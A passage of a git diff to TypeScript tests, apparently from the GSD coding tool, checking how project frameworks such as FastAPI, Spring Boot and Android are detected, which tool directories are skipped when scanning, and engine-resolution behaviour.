+    writeFileSync(join(dir, "vue.config.js"), "module.exports = {};", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("vue.config.js"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: requirements.txt sets Python language", () => {
+  const dir = makeTempDir("signals-requirements");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "flask==3.0\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("requirements.txt"));
+    assert.equal(signals.primaryLanguage, "python");
+    assert.ok(signals.verificationCommands.includes("pytest"), "should suggest pytest for requirements.txt projects");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Android project via app/build.gradle", () => {
+  const dir = makeTempDir("signals-android");
+  try {
+    mkdirSync(join(dir, "app"), { recursive: true });
+    writeFileSync(join(dir, "app", "build.gradle"), "apply plugin: 'com.android.application'", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("app/build.gradle"));
+    assert.equal(signals.primaryLanguage, "java/kotlin");
+    assert.ok(!signals.detectedFiles.includes("build.gradle"), "should not collapse Android app/build.gradle into generic build.gradle");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: nested app/build.gradle normalizes to Android marker", () => {
+  const dir = makeTempDir("signals-android-nested");
+  try {
+    mkdirSync(join(dir, "apps", "mobile", "app"), { recursive: true });
+    writeFileSync(join(dir, "apps", "mobile", "app", "build.gradle"), "apply plugin: 'com.android.application'", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("app/build.gradle"), "should detect nested Android app/build.gradle");
+    assert.ok(!signals.detectedFiles.includes("build.gradle"), "should not emit generic build.gradle marker for nested Android modules");
+    assert.equal(signals.primaryLanguage, "java/kotlin");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Unity project via ProjectSettings/ProjectVersion.txt", () => {
+  const dir = makeTempDir("signals-unity");
+  try {
+    mkdirSync(join(dir, "ProjectSettings"), { recursive: true });
+    writeFileSync(join(dir, "ProjectSettings", "ProjectVersion.txt"), "m_EditorVersion: 2022.3", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("ProjectSettings/ProjectVersion.txt"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Godot project via project.godot", () => {
+  const dir = makeTempDir("signals-godot");
+  try {
+    writeFileSync(join(dir, "project.godot"), "[application]", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("project.godot"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Airflow via airflow.cfg", () => {
+  const dir = makeTempDir("signals-airflow");
+  try {
+    writeFileSync(join(dir, "airflow.cfg"), "[core]\ndags_folder = ./dags", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("airflow.cfg"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Kubernetes via Chart.yaml (Helm)", () => {
+  const dir = makeTempDir("signals-k8s");
+  try {
+    writeFileSync(join(dir, "Chart.yaml"), "apiVersion: v2\nname: my-chart", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("Chart.yaml"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Blockchain via hardhat.config.ts", () => {
+  const dir = makeTempDir("signals-blockchain");
+  try {
+    writeFileSync(join(dir, "hardhat.config.ts"), 'import "@nomiclabs/hardhat-ethers"', "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("hardhat.config.ts"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: CI/CD via .github/workflows", () => {
+  const dir = makeTempDir("signals-cicd");
+  try {
+    mkdirSync(join(dir, ".github", "workflows"), { recursive: true });
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes(".github/workflows"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Tailwind via tailwind.config.ts", () => {
+  const dir = makeTempDir("signals-tailwind");
+  try {
+    writeFileSync(join(dir, "package.json"), '{"name":"tw-app"}', "utf-8");
+    writeFileSync(join(dir, "tailwind.config.ts"), "export default {};", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("tailwind.config.ts"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI detected via requirements.txt dependency", () => {
+  const dir = makeTempDir("signals-fastapi-req");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "fastapi==0.115.0\nuvicorn[standard]\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "should add dep:fastapi marker");
+    assert.equal(signals.primaryLanguage, "python");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI detected via pyproject.toml dependency", () => {
+  const dir = makeTempDir("signals-fastapi-pyproject");
+  try {
+    writeFileSync(join(dir, "pyproject.toml"), '[project]\ndependencies = ["fastapi>=0.100"]\n', "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "should add dep:fastapi marker");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI detected with PEP 508 ~= operator", () => {
+  const dir = makeTempDir("signals-fastapi-compatible-release");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "fastapi~=0.115\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "~= should count as a FastAPI dependency");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: pyproject metadata mention does not trigger dep:fastapi", () => {
+  const dir = makeTempDir("signals-fastapi-pyproject-metadata");
   try {
     writeFileSync(
-      join(dir, "package.json"),
-      JSON.stringify({
-        name: "test",
-        scripts: { test: "vitest", build: "tsc" },
-      }),
+      join(dir, "pyproject.toml"),
+      '[project]\nname = "example"\nkeywords = ["fastapi"]\ndependencies = ["flask>=3.0"]\n',
       "utf-8",
     );
-    writeFileSync(join(dir, "pnpm-lock.yaml"), "", "utf-8");
     const signals = detectProjectSignals(dir);
-    assert.ok(signals.verificationCommands.includes("pnpm test"));
-    assert.ok(signals.verificationCommands.includes("pnpm run build"));
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "metadata-only mentions should not trigger FastAPI detection");
   } finally {
     cleanup(dir);
   }
 });
 
-test("detectProjectSignals: Ruby project with rspec", () => {
-  const dir = makeTempDir("signals-ruby");
+test("detectProjectSignals: pyproject dependency table extras do not trigger dep:fastapi", () => {
+  const dir = makeTempDir("signals-fastapi-pyproject-table-extra");
   try {
-    writeFileSync(join(dir, "Gemfile"), 'source "https://rubygems.org"\n', "utf-8");
-    mkdirSync(join(dir, "spec"), { recursive: true });
+    writeFileSync(
+      join(dir, "pyproject.toml"),
+      '[tool.poetry.dependencies]\npython = "^3.12"\nmy-sdk = { version = "^1.0", extras = ["fastapi"] }\n',
+      "utf-8",
+    );
     const signals = detectProjectSignals(dir);
-    assert.ok(signals.detectedFiles.includes("Gemfile"));
-    assert.equal(signals.primaryLanguage, "ruby");
-    assert.ok(signals.verificationCommands.includes("bundle exec rspec"));
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "dependency table extras should not imply FastAPI framework usage");
   } finally {
     cleanup(dir);
   }
 });
 
-test("detectProjectSignals: Makefile with test target", () => {
-  const dir = makeTempDir("signals-make");
+test("detectProjectSignals: Poetry group FastAPI dependency does not imply app framework usage", () => {
+  const dir = makeTempDir("signals-fastapi-poetry-group");
   try {
-    writeFileSync(join(dir, "Makefile"), "test:\n\tgo test ./...\n\nbuild:\n\tgo build\n", "utf-8");
+    writeFileSync(
+      join(dir, "pyproject.toml"),
+      '[tool.poetry.dependencies]\npython = "^3.12"\nflask = "^3.0"\n\n[tool.poetry.group.dev.dependencies]\nfastapi = "^0.115"\n',
+      "utf-8",
+    );
     const signals = detectProjectSignals(dir);
-    assert.ok(signals.detectedFiles.includes("Makefile"));
-    assert.ok(signals.verificationCommands.includes("make test"));
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "Poetry dev-group dependencies should not imply FastAPI app usage");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: pyproject optional-dependency group name does not trigger dep:fastapi", () => {
+  const dir = makeTempDir("signals-fastapi-pyproject-extra-name");
+  try {
+    writeFileSync(
+      join(dir, "pyproject.toml"),
+      '[project]\ndependencies = ["flask>=3.0"]\n\n[project.optional-dependencies]\nfastapi = ["orjson>=3"]\n',
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "optional-dependency extra names should not trigger FastAPI detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: pyproject multiline optional dependency emits dep:fastapi", () => {
+  const dir = makeTempDir("signals-fastapi-pyproject-optional-multiline");
+  try {
+    writeFileSync(
+      join(dir, "pyproject.toml"),
+      '[project]\ndependencies = ["flask>=3.0"]\n\n[project.optional-dependencies]\napi = [\n  "fastapi>=0.115",\n  "uvicorn>=0.30",\n]\n',
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "multiline optional dependency arrays should trigger FastAPI detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI direct reference with @ emits dep:fastapi", () => {
+  const dir = makeTempDir("signals-fastapi-direct-reference");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "fastapi @ https://example.com/fastapi.whl\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "direct-reference dependencies should trigger FastAPI detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI detected via requirements.in", () => {
+  const dir = makeTempDir("signals-fastapi-requirements-in");
+  try {
+    writeFileSync(join(dir, "requirements.in"), "fastapi>=0.115\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "requirements.in should trigger FastAPI detection");
+    assert.ok(signals.detectedFiles.includes("requirements.txt"), "requirements.in should normalize to requirements.txt marker");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI detected via nested requirements/base.in", () => {
+  const dir = makeTempDir("signals-fastapi-requirements-dir-in");
+  try {
+    mkdirSync(join(dir, "requirements"), { recursive: true });
+    writeFileSync(join(dir, "requirements", "base.in"), "fastapi>=0.115\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "requirements/base.in should trigger FastAPI detection");
+    assert.ok(signals.detectedFiles.includes("requirements.txt"), "requirements/base.in should normalize to requirements.txt marker");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI comments do not trigger dep:fastapi", () => {
+  const dir = makeTempDir("signals-fastapi-comment");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "# maybe evaluate fastapi later\nflask==3.0\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "comments should not trigger FastAPI detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI inline comments do not trigger dep:fastapi", () => {
+  const dir = makeTempDir("signals-fastapi-inline-comment");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "flask==3.0  # maybe fastapi later\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "inline comments should not trigger FastAPI detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: fastapi-* packages do not trigger dep:fastapi without fastapi itself", () => {
+  const dir = makeTempDir("signals-fastapi-suffix-only");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "fastapi-users==13.0\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "fastapi-* packages alone should not imply FastAPI framework usage");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: dependency extras mentioning fastapi do not trigger dep:fastapi", () => {
+  const dir = makeTempDir("signals-fastapi-extra-only");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "my-sdk[fastapi]>=1.0\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "dependency extras should not imply FastAPI framework usage");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Django project does NOT get dep:fastapi marker", () => {
+  const dir = makeTempDir("signals-django-no-fastapi");
+  try {
+    writeFileSync(join(dir, "requirements.txt"), "django==5.0\ncelery\n", "utf-8");
+    writeFileSync(join(dir, "manage.py"), "#!/usr/bin/env python", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:fastapi"), "should NOT add dep:fastapi for Django");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI detected case-insensitively (PyPI canonical name)", () => {
+  const dir = makeTempDir("signals-fastapi-case");
+  try {
+    writeFileSync(join(dir, "pyproject.toml"), '[project]\ndependencies = ["FastAPI>=0.100"]\n', "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "should detect FastAPI (mixed case)");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: FastAPI detected via nested service requirements.txt", () => {
+  const dir = makeTempDir("signals-fastapi-nested");
+  try {
+    mkdirSync(join(dir, "services", "api"), { recursive: true });
+    writeFileSync(join(dir, "services", "api", "requirements.txt"), "fastapi==0.115.0\n", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:fastapi"), "should detect FastAPI in nested service requirements.txt");
+    assert.ok(signals.detectedFiles.includes("requirements.txt"), "should normalize nested requirements.txt marker");
+    assert.equal(signals.primaryLanguage, "python");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: nested Prisma schema normalizes to prisma/schema.prisma", () => {
+  const dir = makeTempDir("signals-prisma-nested");
+  try {
+    mkdirSync(join(dir, "services", "api", "prisma"), { recursive: true });
+    writeFileSync(join(dir, "services", "api", "prisma", "schema.prisma"), "datasource db { provider = \"sqlite\" }", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("prisma/schema.prisma"), "should detect nested Prisma schema");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: nested Spring Boot Gradle service emits dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-gradle-nested");
+  try {
+    mkdirSync(join(dir, "services", "api"), { recursive: true });
+    writeFileSync(
+      join(dir, "services", "api", "build.gradle"),
+      "plugins { id 'org.springframework.boot' version '3.2.0' }",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:spring-boot"), "should detect nested Spring Boot Gradle service");
+    assert.equal(signals.primaryLanguage, "java/kotlin");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: legacy apply plugin syntax emits dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-apply-plugin");
+  try {
+    writeFileSync(join(dir, "build.gradle"), "apply plugin: 'org.springframework.boot'", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:spring-boot"), "apply plugin syntax should trigger Spring Boot detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: nested Spring Boot Kotlin DSL service still uses neutral java/kotlin language hint", () => {
+  const dir = makeTempDir("signals-spring-gradle-kts-nested");
+  try {
+    mkdirSync(join(dir, "services", "api"), { recursive: true });
+    writeFileSync(
+      join(dir, "services", "api", "build.gradle.kts"),
+      "plugins { id(\"org.springframework.boot\") version \"3.2.0\" }",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:spring-boot"));
+    assert.equal(signals.primaryLanguage, "java/kotlin");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Android Gradle project does not emit dep:spring-boot", () => {
+  const dir = makeTempDir("signals-android-no-spring");
+  try {
+    writeFileSync(join(dir, "build.gradle"), "plugins { id 'com.android.application' }", "utf-8");
+    mkdirSync(join(dir, "app"), { recursive: true });
+    writeFileSync(join(dir, "app", "build.gradle"), "plugins { id 'com.android.application' }", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:spring-boot"), "Android Gradle files should not trigger Spring Boot detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Android inline comments do not emit dep:spring-boot", () => {
+  const dir = makeTempDir("signals-android-inline-comment");
+  try {
+    writeFileSync(join(dir, "build.gradle"), "plugins { id 'com.android.application' } // spring-boot maybe later", "utf-8");
+    mkdirSync(join(dir, "app"), { recursive: true });
+    writeFileSync(join(dir, "app", "build.gradle"), "plugins { id 'com.android.application' }", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:spring-boot"), "inline comments should not trigger Spring Boot detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: build metadata mentioning spring-boot does not emit dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-metadata-only");
+  try {
+    writeFileSync(join(dir, "build.gradle"), 'def notes = "spring-boot migration planned later"', "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:spring-boot"), "arbitrary metadata text should not trigger Spring Boot detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Maven artifactId alone does not emit dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-maven-artifact-only");
+  try {
+    writeFileSync(
+      join(dir, "pom.xml"),
+      '<project><modelVersion>4.0.0</modelVersion><groupId>com.example</groupId><artifactId>spring-boot-tools</artifactId></project>',
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:spring-boot"), "artifactId alone should not imply Spring Boot");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Spring Boot version-catalog alias emits dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-version-catalog");
+  try {
+    mkdirSync(join(dir, "gradle"), { recursive: true });
+    writeFileSync(join(dir, "build.gradle.kts"), "plugins { alias(libs.plugins.backend.web) }", "utf-8");
+    writeFileSync(
+      join(dir, "gradle", "libs.versions.toml"),
+      "[plugins]\nbackend-web = { id = 'org.springframework.boot', version = '3.2.0' }\n",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:spring-boot"), "should detect Spring Boot via version-catalog alias");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: commented Spring Boot alias in libs.versions.toml does not emit dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-version-catalog-comment");
+  try {
+    mkdirSync(join(dir, "gradle"), { recursive: true });
+    writeFileSync(join(dir, "build.gradle.kts"), "plugins { alias(libs.plugins.backend.web) }", "utf-8");
+    writeFileSync(
+      join(dir, "gradle", "libs.versions.toml"),
+      "[plugins]\n# backend-web = { id = 'org.springframework.boot', version = '3.2.0' }\n",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:spring-boot"), "commented aliases should not trigger Spring Boot detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: unused Spring Boot alias in libs.versions.toml does not emit dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-version-catalog-unused");
+  try {
+    mkdirSync(join(dir, "gradle"), { recursive: true });
+    writeFileSync(join(dir, "build.gradle.kts"), "plugins { alias(libs.plugins.backend.web) }", "utf-8");
+    writeFileSync(
+      join(dir, "gradle", "libs.versions.toml"),
+      "[plugins]\nother-plugin = { id = 'org.springframework.boot', version = '3.2.0' }\n",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:spring-boot"), "unused Spring Boot aliases should not trigger detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: spring-like alias name without Spring Boot id does not emit dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-version-catalog-false-alias");
+  try {
+    mkdirSync(join(dir, "gradle"), { recursive: true });
+    writeFileSync(join(dir, "build.gradle.kts"), "plugins { alias(libs.plugins.spring.boot.conventions) }", "utf-8");
+    writeFileSync(
+      join(dir, "gradle", "libs.versions.toml"),
+      "[plugins]\nspring-boot-conventions = { id = 'com.example.conventions', version = '1.0.0' }\n",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("dep:spring-boot"), "spring-looking alias names should not imply Spring Boot without matching id");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Spring Boot version-catalog library alias emits dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-version-catalog-library");
+  try {
+    mkdirSync(join(dir, "gradle"), { recursive: true });
+    writeFileSync(join(dir, "build.gradle.kts"), "dependencies { implementation(libs.backend.web) }", "utf-8");
+    writeFileSync(
+      join(dir, "gradle", "libs.versions.toml"),
+      "[libraries]\nbackend-web = { module = 'org.springframework.boot:spring-boot-starter-web', version = '3.2.0' }\n",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:spring-boot"), "Spring Boot library aliases should trigger detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Spring Boot version-catalog bundle alias emits dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-version-catalog-bundle");
+  try {
+    mkdirSync(join(dir, "gradle"), { recursive: true });
+    writeFileSync(join(dir, "build.gradle.kts"), "dependencies { implementation(libs.bundles.backend.web) }", "utf-8");
+    writeFileSync(
+      join(dir, "gradle", "libs.versions.toml"),
+      "[libraries]\nspring-boot-starter-web = { module = 'org.springframework.boot:spring-boot-starter-web', version = '3.2.0' }\n\n[bundles]\nbackend-web = ['spring-boot-starter-web']\n",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:spring-boot"), "Spring Boot bundle aliases should trigger detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Spring Boot custom version-catalog accessor emits dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-version-catalog-custom-accessor");
+  try {
+    mkdirSync(join(dir, "gradle"), { recursive: true });
+    writeFileSync(join(dir, "build.gradle.kts"), "plugins { alias(backend.plugins.web) }", "utf-8");
+    writeFileSync(
+      join(dir, "gradle", "backend.versions.toml"),
+      "[plugins]\nweb = { id = 'org.springframework.boot', version = '3.2.0' }\n",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:spring-boot"), "custom version-catalog accessors should trigger Spring Boot detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Spring Boot settings-defined catalog accessor emits dep:spring-boot", () => {
+  const dir = makeTempDir("signals-spring-version-catalog-settings-accessor");
+  try {
+    mkdirSync(join(dir, "gradle"), { recursive: true });
+    writeFileSync(
+      join(dir, "settings.gradle.kts"),
+      'dependencyResolutionManagement { versionCatalogs { create("backendLibs") { from(files("./gradle/backend.versions.toml")) } } }',
+      "utf-8",
+    );
+    writeFileSync(join(dir, "build.gradle.kts"), "plugins { alias(backendLibs.plugins.web) }", "utf-8");
+    writeFileSync(
+      join(dir, "gradle", "backend.versions.toml"),
+      "[plugins]\nweb = { id = 'org.springframework.boot', version = '3.2.0' }\n",
+      "utf-8",
+    );
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("dep:spring-boot"), "settings-defined catalog accessors should trigger Spring Boot detection");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+// ─── scanProjectFiles: RECURSIVE_SCAN_IGNORED_DIRS ──────────────────────
+
+test("scanProjectFiles: excludes .claude, .gsd, .planning, .plans, .cursor, .vscode directories", () => {
+  const dir = makeTempDir("scan-ignore-dotdirs");
+  try {
+    // Create project files that should be included
+    mkdirSync(join(dir, "src"), { recursive: true });
+    writeFileSync(join(dir, "src", "main.ts"), "// main\n", "utf-8");
+    writeFileSync(join(dir, "README.md"), "# Project\n", "utf-8");
+
+    // Create tool directories that should be excluded
+    const excludedDirs = [".claude", ".gsd", ".planning", ".plans", ".cursor", ".vscode"];
+    for (const d of excludedDirs) {
+      mkdirSync(join(dir, d), { recursive: true });
+      writeFileSync(join(dir, d, "config.json"), "{}\n", "utf-8");
+    }
+    // Nested .claude directory
+    mkdirSync(join(dir, ".claude", "memory"), { recursive: true });
+    writeFileSync(join(dir, ".claude", "memory", "user.md"), "# Memory\n", "utf-8");
+
+    const files = scanProjectFiles(dir);
+
+    // Should include project files
+    assert.ok(files.includes("src/main.ts"), "should include src/main.ts");
+    assert.ok(files.includes("README.md"), "should include README.md");
+
+    // Should exclude all tool directories
+    for (const d of excludedDirs) {
+      const hasExcluded = files.some((f) => f.startsWith(`${d}/`));
+      assert.ok(!hasExcluded, `should exclude ${d}/ directory but found: ${files.filter((f) => f.startsWith(`${d}/`)).join(", ")}`);
+    }
   } finally {
     cleanup(dir);
   }
diff --git a/src/resources/extensions/gsd/tests/dev-engine-wrapper.test.ts b/src/resources/extensions/gsd/tests/dev-engine-wrapper.test.ts
index 32e909629..e2d845962 100644
--- a/src/resources/extensions/gsd/tests/dev-engine-wrapper.test.ts
+++ b/src/resources/extensions/gsd/tests/dev-engine-wrapper.test.ts
@@ -73,7 +73,7 @@ describe("DevWorkflowEngine", () => {
     assert.equal(engine.engineId, "dev");
   });
 
-  test("deriveState returns EngineState with expected fields", async () => {
+  test("deriveState returns EngineState with expected fields", async (t) => {
     const { DevWorkflowEngine } = await import("../dev-workflow-engine.ts");
     const engine = new DevWorkflowEngine();
 
@@ -81,31 +81,29 @@ describe("DevWorkflowEngine", () => {
     const tempDir = mkdtempSync(join(tmpdir(), "gsd-engine-test-"));
     mkdirSync(join(tempDir, ".gsd", "milestones"), { recursive: true });
 
-    try {
-      const state = await engine.deriveState(tempDir);
+    t.after(() => rmSync(tempDir, { recursive: true, force: true }));
 
-      assert.equal(typeof state.phase, "string", "phase should be a string");
-      assert.ok(
-        "currentMilestoneId" in state,
-        "state should have currentMilestoneId",
-      );
-      assert.ok(
-        "activeSliceId" in state,
-        "state should have activeSliceId",
-      );
-      assert.ok(
-        "activeTaskId" in state,
-        "state should have activeTaskId",
-      );
-      assert.equal(
-        typeof state.isComplete,
-        "boolean",
-        "isComplete should be boolean",
-      );
-      assert.ok("raw" in state, "state should have raw field");
-    } finally {
-      rmSync(tempDir, { recursive: true, force: true });
-    }
+    const state = await engine.deriveState(tempDir);
+
+    assert.equal(typeof state.phase, "string", "phase should be a string");
+    assert.ok(
+      "currentMilestoneId" in state,
+      "state should have currentMilestoneId",
+    );
+    assert.ok(
+      "activeSliceId" in state,
+      "state should have activeSliceId",
+    );
+    assert.ok(
+      "activeTaskId" in state,
+      "state should have activeTaskId",
+    );
+    assert.equal(
+      typeof state.isComplete,
+      "boolean",
+      "isComplete should be boolean",
+    );
+    assert.ok("raw" in state, "state should have raw field");
   });
 
   test("reconcile returns continue for non-complete state", async () => {
@@ -280,16 +278,14 @@ describe("Kill switch (GSD_ENGINE_BYPASS)", () => {
     }
   });
 
-  test("GSD_ENGINE_BYPASS=1 does not affect resolveEngine (bypass checked in autoLoop)", async () => {
+  test("GSD_ENGINE_BYPASS=1 does not affect resolveEngine (bypass checked in autoLoop)", async (t) => {
     const { resolveEngine } = await import("../engine-resolver.ts");
     process.env.GSD_ENGINE_BYPASS = "1";
-    try {
-      // resolveEngine should still resolve normally — bypass is checked in autoLoop
-      const { engine } = resolveEngine({ activeEngineId: null });
-      assert.ok(engine, "should return an engine even with bypass set");
-    } finally {
-      delete process.env.GSD_ENGINE_BYPASS;
-    }
+    t.after(() => delete process.env.GSD_ENGINE_BYPASS);
+
+    // resolveEngine should still resolve normally — bypass is checked in autoLoop
+    const { engine } = resolveEngine({ activeEngineId: null });
+    assert.ok(engine, "should return an engine even with bypass set");
   });
 });
 
diff --git a/src/resources/extensions/gsd/tests/discord-invite-links.test.ts b/src/resources/extensions/gsd/tests/discord-invite-links.test.ts
new file mode 100644
index 000000000..8b82d4749
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/discord-invite-links.test.ts
@@ -0,0 +1,47 @@
+import assert from "node:assert/strict";
+import { describe, it } from "node:test";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+/**
+ * Validates that all Discord invite links in user-facing files point to valid,
+ * consistent invite URLs — not expired vanity links.
+ *
+ * Regression test for https://github.com/gsd-build/gsd-2/issues/2699
+ */
+
+const ROOT = process.cwd();
+
+/** Canonical Discord invite for the GSD community. */
+const VALID_INVITE = "https://discord.com/invite/nKXTsAcmbT";
+
+/** Files that contain user-facing Discord invite links. */
